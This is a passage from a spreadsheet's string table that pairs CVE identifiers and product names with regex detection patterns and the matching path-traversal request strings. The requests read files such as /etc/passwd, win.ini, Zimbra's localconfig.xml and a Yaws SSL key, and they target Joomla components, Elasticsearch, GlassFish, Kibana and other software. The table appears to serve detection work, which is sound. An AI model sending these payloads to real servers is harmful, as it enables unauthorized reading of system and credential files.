    <t>.*?(?:/index\.php\?option=com_travelbook&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_travelbook&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1533</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_tweetla&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_tweetla&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1659</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_ultimateportfolio&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_ultimateportfolio&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1304</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_userstatus&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_userstatus&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1354</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_vjdeo&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_vjdeo&amp;controller=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2918</t>
  </si>
  <si>
    <t>.*?(?:/administrator/components/com_joomla-visites/core/include/myMailer\.class\.php\?mosConfig_absolute_path=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-1607</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_wmi&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_wmi&amp;controller=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1470</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_webtv&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_webtv&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1602</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_zimbcomment&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_zimbcomment&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1603</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_zimbcore&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_zimbcore&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0985</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_abbrev&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_abbrev&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2259</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_bfsurvey&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_bfsurvey&amp;controller=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0157</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_biblestudy&amp;id=1&amp;view=studieslist&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_biblestudy&amp;id=1&amp;view=studieslist&amp;controller=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-0982</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_cartweberp&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_cartweberp&amp;controller=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-1081</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_communitypolls&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_communitypolls&amp;controller=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0972</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_gcalendar&amp;controller=\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_gcalendar&amp;controller=../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1219</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_janews&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_janews&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1340</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jresearch&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jresearch&amp;controller=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1056</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_rokdownloads&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_rokdownloads&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1717</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_if_surfalert&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_if_surfalert&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1723</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_drawroot&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_drawroot&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1953</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_multimap&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_multimap&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1954</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_multiroot&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_multiroot&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2680</t>
  </si>
  <si>
    <t>.*?(?:/propertyfinder/component/jesectionfinder/\?view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-1531</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_redshop&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_redshop&amp;view=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1983</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_redtwitter&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_redtwitter&amp;view=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1315</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_weberpcustomer&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_weberpcustomer&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2033</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_perchacategoriestree&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_perchacategoriestree&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0759</t>
  </si>
  <si>
    <t>.*?(?:/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader\.php\?files\[\]=/etc/passwd).*</t>
  </si>
  <si>
    <t>/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-4239</t>
  </si>
  <si>
    <t>.*?(?:/tiki-jsplugin\.php\?plugin=x&amp;language=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini).*</t>
  </si>
  <si>
    <t>/tiki-jsplugin.php?plugin=x&amp;language=../../../../../../../../../../windows/win.ini</t>
  </si>
  <si>
    <t>CVE-2011-4804</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_kp&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_kp&amp;controller=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>OpenEMR</t>
  </si>
  <si>
    <t>CVE-2012-0991</t>
  </si>
  <si>
    <t>.*?(?:/contrib/acog/print_form\.php\?formname=\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/contrib/acog/print_form.php?formname=../../../etc/passwd%00</t>
  </si>
  <si>
    <t>Zimbra Collaboration Server</t>
  </si>
  <si>
    <t>CVE-2013-7091</t>
  </si>
  <si>
    <t>.*?(?:/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg\.js\.zgz\?v=091214175450&amp;skin=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./opt/zimbra/conf/localconfig\.xml%00|/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg\.js\.zgz\?v=091214175450&amp;skin=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&amp;skin=../../../../../../../../../etc/passwd%00|/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&amp;skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</t>
  </si>
  <si>
    <t>Fonality trixbox</t>
  </si>
  <si>
    <t>CVE-2014-5111</t>
  </si>
  <si>
    <t>.*?(?:/maint/modules/endpointcfg/endpointcfg\.php\?lang=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>Osclass Security Advisory</t>
  </si>
  <si>
    <t>CVE-2014-6308</t>
  </si>
  <si>
    <t>.*?(?:/osclass/oc-admin/index\.php\?page=appearance&amp;action=render&amp;file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/osclass/oc-admin/index.php?page=appearance&amp;action=render&amp;file=../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Simple Online Planning Tool</t>
  </si>
  <si>
    <t>CVE-2014-8676</t>
  </si>
  <si>
    <t>.*?(?:/process/feries\.php\?fichier=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/process/feries.php?fichier=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Bonita BPM Portal</t>
  </si>
  <si>
    <t>CVE-2015-3897</t>
  </si>
  <si>
    <t>.*?(?:/bonita/portal/themeResource\?theme=portal/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./&amp;location=Windows/win\.ini|/bonita/portal/themeResource\?theme=portal/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./&amp;location=etc/passwd).*</t>
  </si>
  <si>
    <t>/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&amp;location=etc/passwd|/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&amp;location=Windows/win.ini</t>
  </si>
  <si>
    <t>ElasticSearch</t>
  </si>
  <si>
    <t>CVE-2015-5531</t>
  </si>
  <si>
    <t>.*?(?:/_snapshot/test/backdata%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd|/_snapshot/test2|/_snapshot/test</t>
  </si>
  <si>
    <t>CVE-2015-3337</t>
  </si>
  <si>
    <t>.*?(?:/_plugin/head/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2015-4074</t>
  </si>
  <si>
    <t>.*?(?:/\?option=com_helpdeskpro&amp;task=ticket\.download_attachment&amp;filename=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;original_filename=AnyFileName\.exe).*</t>
  </si>
  <si>
    <t>/?option=com_helpdeskpro&amp;task=ticket.download_attachment&amp;filename=/../../../../../../../../../../../../etc/passwd&amp;original_filename=AnyFileName.exe</t>
  </si>
  <si>
    <t>ManageEngine Firewall Analyzer</t>
  </si>
  <si>
    <t>CVE-2015-7780</t>
  </si>
  <si>
    <t>.*?(?:/fw/mindex\.do\?url=\./WEB-INF/web\.xml%3f).*</t>
  </si>
  <si>
    <t>/fw/mindex.do?url=./WEB-INF/web.xml%3f</t>
  </si>
  <si>
    <t>SysAid Help Desk</t>
  </si>
  <si>
    <t>CVE-2015-2996</t>
  </si>
  <si>
    <t>.*?(?:/sysaid/getGfiUpgradeFile\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/getGfiUpgradeFile\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd|/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Xceedium Xsuite</t>
  </si>
  <si>
    <t>CVE-2015-4666</t>
  </si>
  <si>
    <t>.*?(?:/opm/read_sessionlog\.php\?logFile=\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd).*</t>
  </si>
  <si>
    <t>/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd</t>
  </si>
  <si>
    <t>Opsview Monitor Pro</t>
  </si>
  <si>
    <t>CVE-2016-10367</t>
  </si>
  <si>
    <t>.*?(?:/monitoring/\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252fetc/passwd).*</t>
  </si>
  <si>
    <t>/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd</t>
  </si>
  <si>
    <t xml:space="preserve">ZOHO WebNMS Framework </t>
  </si>
  <si>
    <t>CVE-2016-6601</t>
  </si>
  <si>
    <t>.*?(?:/servlets/FetchFile\?fileName=\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/servlets/FetchFile?fileName=../../../etc/passwd</t>
  </si>
  <si>
    <t>FiberHome Routers</t>
  </si>
  <si>
    <t>CVE-2017-15647</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/webproc\?getpage=/etc/passwd&amp;var:language=en_us&amp;var:page=wizardfifth).*</t>
  </si>
  <si>
    <t>/cgi-bin/webproc?getpage=/etc/passwd&amp;var:language=en_us&amp;var:page=wizardfifth</t>
  </si>
  <si>
    <t>GlassFish</t>
  </si>
  <si>
    <t>CVE-2017-1000028</t>
  </si>
  <si>
    <t>.*?(?:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/theme/META-INF/prototype%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%af\.\.%c0%afwindows/win\.ini).*\|.*?(?:/resource/file%3a///etc/passwd/).*</t>
  </si>
  <si>
    <t>/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd|/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini\|/resource/file%3a///etc/passwd/</t>
  </si>
  <si>
    <t>Yaws</t>
  </si>
  <si>
    <t>CVE-2017-10974</t>
  </si>
  <si>
    <t>.*?(?:/%5C\.\./ssl/yaws-key\.pem).*</t>
  </si>
  <si>
    <t>/%5C../ssl/yaws-key.pem</t>
  </si>
  <si>
    <t>Argus Surveillance DVR</t>
  </si>
  <si>
    <t>CVE-2018-15745</t>
  </si>
  <si>
    <t>.*?(?:/WEBACCOUNT\.CGI\?OkBtn=\+\+Ok\+\+&amp;RESULTPAGE=\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2FWindows%2Fsystem\.ini&amp;USEREDIRECT=1&amp;WEBACCOUNTID=&amp;WEBACCOUNTPASSWORD=).*</t>
  </si>
  <si>
    <t>/WEBACCOUNT.CGI?OkBtn=++Ok++&amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&amp;USEREDIRECT=1&amp;WEBACCOUNTID=&amp;WEBACCOUNTPASSWORD=</t>
  </si>
  <si>
    <t>Centos Web Panel</t>
  </si>
  <si>
    <t>CVE-2018-18323</t>
  </si>
  <si>
    <t>.*?(?:/admin/index\.php\?module=file_editor&amp;file=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/admin/index.php?module=file_editor&amp;file=/../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2018-0296</t>
  </si>
  <si>
    <t>.*?(?:/\+CSCOU\+/\.\./\+CSCOE\+/files/file_list\.json\?path=/sessions).*</t>
  </si>
  <si>
    <t>/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions</t>
  </si>
  <si>
    <t>Drupal avatar_uploader</t>
  </si>
  <si>
    <t>CVE-2018-9205</t>
  </si>
  <si>
    <t>.*?(?:/sites/all/modules/avatar_uploader/lib/demo/view\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2018-6008</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jtagmembersdirectory&amp;task=attachment&amp;download_file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jtagmembersdirectory&amp;task=attachment&amp;download_file=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Kibana</t>
  </si>
  <si>
    <t>CVE-2018-17246</t>
  </si>
  <si>
    <t>.*?(?:/api/console/api_server\?sense_version=%40%40SENSE_VERSION&amp;apis=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/api/console/api_server?sense_version=%40%40SENSE_VERSION&amp;apis=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Loytec LGATE</t>
  </si>
  <si>
    <t>CVE-2018-14916</t>
  </si>
  <si>
    <t>.*?(?:/webui/file_guest\?path=/var/www/documentation/\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;flags=1152).*</t>
  </si>
  <si>
    <t>/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&amp;flags=1152</t>
  </si>
  <si>
    <t>Microstrategy Web</t>
  </si>
  <si>
    <t>CVE-2018-18777</t>
  </si>
  <si>
    <t>.*?(?:/WebMstr7/servlet/mstrWeb\?evt=3045&amp;src=mstrWeb\.3045&amp;subpage=\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/WebMstr7/servlet/mstrWeb?evt=3045&amp;src=mstrWeb.3045&amp;subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>CVE-2018-3760</t>
  </si>
  <si>
    <t>.*?(?:/assets/file:%2f%2f.*?/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd|/assets/file:%2f%2f/etc/passwd).*</t>
  </si>
  <si>
    <t>/assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd|/assets/file:%2f%2f/etc/passwd</t>
  </si>
  <si>
    <t>CVE-2018-1271</t>
  </si>
  <si>
    <t>.*?(?:/spring-mvc-showcase/resources/%255c%255c\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/windows/win\.ini|/static/%255c%255c\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/\.\.%255c/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini|/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini</t>
  </si>
  <si>
    <t>Tarantella Enterprise</t>
  </si>
  <si>
    <t>CVE-2018-19753</t>
  </si>
  <si>
    <t>.*?(?:/tarantella/cgi-bin/secure/ttawlogin\.cgi/\?action=start&amp;pg=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&amp;pg=../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Tyto Sahi</t>
  </si>
  <si>
    <t>CVE-2018-20470</t>
  </si>
  <si>
    <t>.*?(?:/_s_/dyn/Log_highlight\?href=\.\./\.\./\.\./\.\./windows/win\.ini&amp;n=1#selected).*</t>
  </si>
  <si>
    <t>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&amp;n=1#selected</t>
  </si>
  <si>
    <t>Zeit Next</t>
  </si>
  <si>
    <t>CVE-2018-6184</t>
  </si>
  <si>
    <t>.*?(?:/_next/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/_next/../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Zeta Producer DesktopCMS</t>
  </si>
  <si>
    <t>CVE-2018-13980</t>
  </si>
  <si>
    <t>.*?(?:/assets/php/filebrowser/filebrowser\.main\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;do=download).*</t>
  </si>
  <si>
    <t>/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&amp;do=download</t>
  </si>
  <si>
    <t>node</t>
  </si>
  <si>
    <t>CVE-2018-3714</t>
  </si>
  <si>
    <t>.*?(?:/node_modules/\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/node_modules/../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Aptana Jaxer</t>
  </si>
  <si>
    <t>CVE-2019-14312</t>
  </si>
  <si>
    <t>.*?(?:/tools/sourceViewer/index\.html\?filename=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>BlogEngine</t>
  </si>
  <si>
    <t>CVE-2019-10717</t>
  </si>
  <si>
    <t>.*?(?:/api/filemanager\?path=%2F\.\.%2f\.\.%2fContent).*</t>
  </si>
  <si>
    <t>/api/filemanager?path=%2F..%2f..%2fContent</t>
  </si>
  <si>
    <t>DOMOS</t>
  </si>
  <si>
    <t>CVE-2019-18665</t>
  </si>
  <si>
    <t>.*?(?:/page/sl_logdl\?dcfct=DCMlog\.download_log&amp;dbkey%3Asyslog\.rlog=/etc/passwd).*</t>
  </si>
  <si>
    <t>/page/sl_logdl?dcfct=DCMlog.download_log&amp;dbkey%3Asyslog.rlog=/etc/passwd</t>
  </si>
  <si>
    <t>Deltek Maconomy</t>
  </si>
  <si>
    <t>CVE-2019-12314</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/Maconomy/MaconomyWS\.macx1\.W_MCS//etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd</t>
  </si>
  <si>
    <t>GrandNode</t>
  </si>
  <si>
    <t>CVE-2019-12276</t>
  </si>
  <si>
    <t>.*?(?:/LetsEncrypt/Index\?fileName=/etc/passwd).*</t>
  </si>
  <si>
    <t>/LetsEncrypt/Index?fileName=/etc/passwd</t>
  </si>
  <si>
    <t>Homematic CCU</t>
  </si>
  <si>
    <t>CVE-2019-9726</t>
  </si>
  <si>
    <t>.*?(?:/\.%00\./\.%00\./etc/passwd).*</t>
  </si>
  <si>
    <t>/.%00./.%00./etc/passwd</t>
  </si>
  <si>
    <t>Huawei Firewall</t>
  </si>
  <si>
    <t>CVE-2019-19411</t>
  </si>
  <si>
    <t>.*?(?:/umweb/\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/umweb/../etc/passwd</t>
  </si>
  <si>
